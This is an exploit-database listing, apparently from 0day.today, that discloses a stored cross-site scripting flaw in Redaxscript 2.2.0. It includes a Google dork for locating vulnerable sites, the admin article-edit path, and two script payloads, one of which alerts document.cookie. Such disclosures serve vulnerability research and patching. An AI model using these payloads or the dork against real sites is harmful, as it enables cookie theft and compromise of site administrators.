[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Redaxscript 2.2.0 XSS Vulnerability

Author
0x97
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-23061
Category
web applications
Date add
04-01-2015
Platform
php
_____       _____  ______
|  _  |     |  _  ||___  /
| |/' |_  __| |_| |   / / 
|  /| \ \/ /\____ |  / /  
\ |_/ />  < .___/ /./ /   
 \___//_/\_\\____/ \_/    
                        by bl4ck s3c


# Exploit Title: Redaxscript 2.2.0 XSS Vulnerability
# Date: 04-01-2015
# Google Dork : Powered by Redaxscript 2.2.0
# Exploit Author: 0x97
# Version: 2.2.0
# Vendor Homepage: http://www.redaxscript.com/
# Tested on: OWASP Mantra & Iceweasel
 
# Vulnerability Description:

CMS is vulnerable to XSS attacks. You can run XSS payloads at new article section.

XSS Vulnerability :

Go edit or add new article page

"http://{target-url}/admin/edit/extras/1"

Add new article and use payloads;

"><script>alert(String.fromCharCode(48, 120, 57, 55))</script>

or

"><script>alert(document.cookie)</script>


========
Credits:
========
 
Vulnerability found and advisory written by Ahmet Agar.
 
===========
References:
===========
 
http://www.0x97.info
https://twitter.com/_HacKingZ_

#  0day.today [2024-10-05]  #